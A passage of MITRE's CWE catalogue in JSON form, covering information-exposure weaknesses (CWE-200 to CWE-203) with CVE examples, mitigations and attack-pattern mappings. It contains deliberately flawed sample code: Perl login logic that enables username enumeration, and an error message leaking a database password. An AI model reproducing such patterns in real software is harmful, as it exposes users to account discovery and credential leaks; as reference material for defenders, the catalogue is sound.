weakness.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2049"},{"Reference":"CVE-2007-5172","Description":"Program reveals password in error message if attacker can trigger certain database errors.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5172"},{"Reference":"CVE-2008-4638","Description":"Composite: application running with high privileges (CWE-250) allows user to specify a restricted file to process, which generates a parsing error that leaks the contents of the file (CWE-209).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4638"},{"Reference":"CVE-2007-1409","Description":"Direct request to library file in web application triggers pathname leak in error message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1409"},{"Reference":"CVE-2005-0603","Description":"Malformed regexp syntax leads to information exposure in error message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0603"},{"Reference":"CVE-2004-2268","Description":"Password exposed in debug information.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2268"},{"Reference":"CVE-2003-1078","Description":"FTP client with debug option enabled shows password to the screen.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1078"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Information Leak (information disclosure)"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A6","Entry_Name":"Information Leakage and Improper Error Handling","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":13,"Entry_Name":"Information Leakage"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"116"}},{"attr":{"@_CAPEC_ID":"13"}},{"attr":{"@_CAPEC_ID":"169"}},{"attr":{"@_CAPEC_ID":"22"}},{"attr":{"@_CAPEC_ID":"224"}},{"attr":{"@_CAPEC_ID":"285"}},{"attr":{"@_CAPEC_ID":"287"}},{"attr":{"@_CAPEC_ID":"290"}},{"attr":{"@_CAPEC_ID":"291"}},{"attr":{"@_CAPEC_ID":"292"}},{"attr":{"@_CAPEC_ID":"293"}},{"attr":{"@_CAPEC_ID":"294"}},{"attr":{"@_CAPEC_ID":"295"}},{"attr":{"@_CAPEC_ID":"296"}},{"attr":{"@_CAPEC_ID":"297"}},{"attr":{"@_CAPEC_ID":"298"}},{"attr":{"@_CAPEC_ID":"299"}},{"attr":{"@_CAPEC_ID":"300"}},{"attr":{"@_CAPEC_ID":"301"}},{"attr":{"@_CAPEC_ID":"302"}},{"attr":{"@_CAPEC_ID":"303"}},{"attr":{"@_CAPEC_ID":"304"}},{"attr":{"@_CAPEC_ID":"305"}},{"attr":{"@_CAPEC_ID":"306"}},{"attr":{"@_CAPEC_ID":"307"}},{"attr":{"@_CAPEC_ID":"308"}},{"attr":{"@_CAPEC_ID":"309"}},{"attr":{"@_CAPEC_ID":"310"}},{"attr":{"@_CAPEC_ID":"312"}},{"attr":{"@_CAPEC_ID":"313"}},{"attr":{"@_CAPEC_ID":"317"}},{"attr":{"@_CAPEC_ID":"318"}},{"attr":{"@_CAPEC_ID":"319"}},{"attr":{"@_CAPEC_ID":"320"}},{"attr":{"@_CAPEC_ID":"321"}},{"attr":{"@_CAPEC_ID":"322"}},{"attr":{"@_CAPEC_ID":"323"}},{"attr":{"@_CAPEC_ID":"324"}},{"attr":{"@_CAPEC_ID":"325"}},{"attr":{"@_CAPEC_ID":"326"}},{"attr":{"@_CAPEC_ID":"327"}},{"attr":{"@_CAPEC_ID":"328"}},{"attr":{"@_CAPEC_ID":"329"}},{"attr":{"@_CAPEC_ID":"330"}},{"attr":{"@_CAPEC_ID":"472"}},{"attr":{"@_CAPEC_ID":"497"}},{"attr":{"@_CAPEC_ID":"508"}},{"attr":{"@_CAPEC_ID":"573"}},{"attr":{"@_CAPEC_ID":"574"}},{"attr":{"@_CAPEC_ID":"575"}},{"attr":{"@_CAPEC_ID":"576"}},{"attr":{"@_CAPEC_ID":"577"}},{"attr":{"@_CAPEC_ID":"59"}},{"attr":{"@_CAPEC_ID":"60"}},{"attr":{"@_CAPEC_ID":"616"}},{"attr":{"@_CAPEC_ID":"643"}},{"attr":{"@_CAPEC_ID":"646"}},{"attr":{"@_CAPEC_ID":"651"}},{"attr":{"@_CAPEC_ID":"79"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-172"}}},"Notes":{"Note":{"#text":"As a result of mapping analysis in the 2020 Top 25, this weakness is under review, since it is frequently misused in mapping to cover many problems that lead to loss of confidentiality. See Extended Decription and Alternate Terms.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Likelihood_of_Exploit, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Alternate_Terms, Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Observed_Examples, Related_Attack_Patterns, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Alternate_Terms, Description, Maintenance_Notes, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak (Information Disclosure)","attr":{"@_Date":"2009-12-28"}},{"#text":"Information Exposure","attr":{"@_Date":"2020-02-24"}}]}},"201":{"attr":{"@_ID":"201","@_Name":"Insertion of Sensitive Information Into Sent Data","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code transmits data to another actor, but a portion of the data includes sensitive information that should not be accessible to that actor.","Extended_Description":"Sensitive information could include data that is sensitive in and of itself (such as credentials or private messages), or otherwise useful in the further exploitation of the system (such as internal file system structure).","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"209","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"202","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Files or Directories","Read Memory","Read Application Data"],"Note":"Sensitive data may be exposed to attackers."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Specify which data in the software should be regarded as sensitive. Consider which types of users should have access to which types of data."},{"Phase":"Implementation","Description":"Ensure that any possibly sensitive data specified in the requirements is verified with designers to ensure that it is either a calculated risk or mitigated elsewhere. Any information that is not necessary to the functionality should be removed in order to lower both the overhead and the possibility of security sensitive data being sent."},{"Phase":"System Configuration","Description":"Setup default error messages so that unexpected errors do not disclose sensitive information."},{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-129"},"Intro_Text":"The following is an actual MySQL error statement:","Example_Code":{"attr":{"@_Nature":"result","@_Language":"SQL"},"xhtml:div":"Warning: mysql_pconnect(): Access denied for user: \'root@localhost\' (Using password: N1nj4) in /usr/local/www/wi-data/includes/database.inc on line 4"},"Body_Text":"The error clearly exposes the database credentials."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Accidental leaking of sensitive information through sent data"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"12"}},{"attr":{"@_CAPEC_ID":"217"}},{"attr":{"@_CAPEC_ID":"612"}},{"attr":{"@_CAPEC_ID":"613"}},{"attr":{"@_CAPEC_ID":"618"}},{"attr":{"@_CAPEC_ID":"619"}},{"attr":{"@_CAPEC_ID":"621"}},{"attr":{"@_CAPEC_ID":"622"}},{"attr":{"@_CAPEC_ID":"623"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Common_Consequences, Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Demonstrative_Examples, Description, Name, References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Sent Data","attr":{"@_Date":"2010-09-27"}},{"#text":"Information Exposure Through Sent Data","attr":{"@_Date":"2020-02-24"}},{"#text":"Exposure of Sensitive Information Through Sent Data","attr":{"@_Date":"2020-08-20"}}]}},"202":{"attr":{"@_ID":"202","@_Name":"Exposure of Sensitive Information Through Data Queries","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"When trying to keep information confidential, an attacker can often infer some of the information by using statistics.","Extended_Description":"In situations where data should not be tied to individual users, but a large number of users should be able to make queries that \\"scrub\\" the identity of users, it may be possible to get information about a user -- e.g., by specifying search terms that are known to be unique to that user.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1230","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Files or Directories","Read Application Data"],"Note":"Sensitive information may possibly be leaked through data queries accidentally."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"This is a complex topic. See the book Translucent Databases for a good discussion of best practices."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"See the book Translucent Databases for examples."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Accidental leaking of sensitive information through data queries"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Notes":{"Note":{"attr":{"@_Type":"Maintenance"},"xhtml:p":"The relationship between CWE-202 and CWE-612 needs to be investigated more closely, as they may be different descriptions of the same kind of problem.  CWE-202 is also being considered for deprecation, as it is not clearly described and may have been misunderstood by CWE users.  It could be argued that this issue is better covered by CAPEC; an attacker can utilize their data-query privileges to perform this kind of operation, and if the attacker should not be allowed to perform the operation - or if the sensitive data should not have been made accessible at all - then that is more appropriately classified as a separate CWE related to authorization (see the parent, CWE-1230)."}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Maintenance_Notes, Name, References, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Data Queries","attr":{"@_Date":"2008-04-11"}},{"#text":"Privacy Leak through Data Queries","attr":{"@_Date":"2011-03-29"}},{"#text":"Exposure of Sensitive Data Through Data Queries","attr":{"@_Date":"2020-02-24"}}]}},"203":{"attr":{"@_ID":"203","@_Name":"Observable Discrepancy","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product behaves differently or sends different responses under different circumstances in a way that is observable to an unauthorized actor, which exposes security-relevant information about the state of the product, such as whether a particular operation was successful or not.","Extended_Description":"Discrepancies can take many forms, and variations may be detectable in timing, control flow, communications such as replies or requests, or general behavior. These discrepancies can reveal information about the product\'s operation or internal state to an unauthorized actor. In some cases, discrepancies can be used by attackers to form a side channel.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Side Channel Attack","Description":"Observable Discrepancies are at the root of side channel attacks."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control"],"Impact":["Read Application Data","Bypass Protection Mechanism"],"Note":"An attacker can gain access to sensitive information about the system, including authentication information that may allow an attacker to gain access to the system."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"When cryptographic primitives are vulnerable to side-channel-attacks, this could be used to reveal unencrypted plaintext in the worst case."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}},{"attr":{"@_Mitigation_ID":"MIT-39"},"Phase":"Implementation","Description":{"xhtml:p":["Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success.","If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files.","Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-38"},"Intro_Text":"The following code checks validity of the supplied username and password and notifies the user of a successful or failed login.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $username=param(\'username\');my $password=param(\'password\');if (IsValidUsername($username) == 1){}else{}","xhtml:br":["","","","","",""],"xhtml:div":[{"#text":"if (IsValidPassword($username, $password) == 1){}else{}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":[{"#text":"print \\"Login Successful\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"print \\"Login Failed - incorrect password\\";","attr":{"@_style":"margin-left:10px;"}}]},{"#text":"print \\"Login Failed - unknown username\\";","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"result"},"xhtml:div":"\\"Login Failed - incorrect username or password\\""}],"Body_Text":["In the above code, there are different messages for when an incorrect username is supplied, versus when the username is correct but the password is wrong. This difference enables a potential attacker to understand the state of the login function, and could allow an attacker to discover a valid username by trying different values until the incorrect password message is returned. In essence, this makes it easier for an attacker to obtain half of the necessary authentication credentials.","While this type of information may be helpful to a user, it is also useful to a potential attacker. In the above example, the message for both failed cases should be the same, such as:"]},{"Intro_Text":"Non-uniform processing time causes timing channel.","Example_Code":[{"#text":"Suppose an algorithm for implementing an encryption routine works fine per se, but the time taken to output the result of the encryption routine depends on a relationship between the input plaintext and the key (e.g., suppose, if the plaintext is similar to the key, it would run very fast).","attr":{"@_Nature":"bad"}},{"#text":"Artificial delays may be added to ensured all calculations take equal time to execute.","attr":{"@_Nature":"good"}}],"Body_Text":"In the example above, an attacker may vary the inputs, then observe differences between processing times (since different plaintexts take different time). This could be used to infer information about the key."},{"Intro_Text":"Suppose memory access patterns for an encryption routine are dependent on the secret key.","Body_Text":"An attacker can recover the key by knowing if specific memory locations have been accessed or not.  The value stored at those memory locations is irrelevant.  The encryption routine\'s memory accesses will affect the state of the processor cache.  If cache resources are shared across contexts, after the encryption routine completes, an attacker in different execution context can discover which memory locations the routine accessed by measuring the time it takes for their own memory accesses to complete."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2020-8695","Description":"Observable discrepancy in the RAPL interface for some Intel processors allows information disclosure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8695"},{"Reference":"CVE-2002-2094","Description":"This, and others, use \\"..\\" attacks and monitor error responses, so there is overlap with directory traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2094"},{"Reference":"CVE-2001-1483","Description":"Enumeration of valid usernames based on inconsistent responses","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1483"},{"Reference":"CVE-2001-1528","Description":"Account number enumeration via inconsistent responses.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1528"},{"Reference":"CVE-2004-2150","Description":"User enumeration via discrepancies in error messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2150"},{"Reference":"CVE-2005-1650","Description":"User enumeration via discrepancies in error messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1650"},{"Reference":"CVE-2004-0294","Description":"Bulletin Board displays different error messages when a user exists or not, which makes it easier for remote attackers to identify valid users and conduct a brute force password guessing attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0294"},{"Reference":"CVE-2004-0243","Description":"Operating System, when direct remote login is disabled, displays a different message if the password is correct, which allows remote attackers to guess the password via brute force methods.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0243"},{"Reference":"CVE-2002-0514","Description":"Product allows remote attackers to determine if a port is being filtered because the response packet TTL is different than the default TTL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0514"},{"Reference":"CVE-2002-0515","Description":"Product sets a different TTL when a port is being filtered than when it is not being filtered, which allows remote attackers to identify filtered ports by comparing TTLs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0515"},{"Reference":"CVE-2002-0208","Description":"Product modifies TCP/IP stack and ICMP error messages in unusual ways that show the product is in use.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0208"},{"Reference":"CVE-2004-2252","Description":"Behavioral infoleak by responding to SYN-FIN packets.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2252"},{"Reference":"CVE-2001-1387","Description":"Product may generate different responses than specified by the administrator, possibly leading to an information leak.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1387"},{"Reference":"CVE-2004-0778","Description":"Version control system allows remote attackers to determine the existence of arbitrary files and directories via the -X command for an alternate history file, which causes different error messages to be returned.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0778"},{"Reference":"CVE-2004-1428","Description":"FTP server generates an error message if the user name does not exist instead of prompting for a password, which allows remote attackers to determine valid usernames.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1428"},{"Reference":"CVE-2003-0078","Description":"SSL implementation does not perform a MAC computation if an incorrect block cipher padding is used, which causes an information leak (timing discrepancy) that may make it easier to launch cryptographic attacks that rely on distinguishing between padding and MAC verification errors, possibly leading to extraction of the original plaintext, aka the \\"Vaudenay timing attack.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0078"},{"Reference":"CVE-2000-1117","Description":"Virtual machine allows malicious web site operators to determine the existence of files on the client by measuring delays in the execution of the getSystemResource method.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1117"},{"Reference":"CVE-2003-0637","Description":"Product uses a shorter timeout for a non-existent user than a valid user, which makes it easier for remote attackers to guess usernames and conduct brute force password guessing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0637"},{"Reference":"CVE-2003-0190","Description":"Product immediately sends an error message when a user does not exist, which allows remote attackers to determine valid usernames via a timing attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0190"},{"Reference":"CVE-2004-1602","Description":"FTP server responds in a different amount of time when a given username exists, which allows remote attackers to identify valid usernames by timing the server response.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1602"},{"Reference":"CVE-2005-0918","Description":"Browser allows remote attackers to determine the existence of arbitrary files by setting the src property to the target filename and using Javascript to determine if the web page immediately stops loading, which indicates whether the file exists or not.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0918"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Discrepancy Information Leaks"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A6","Entry_Name":"Information Leakage and Improper Error Handling","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A7","Entry_Name":"Improper Error Handling","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"189"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content 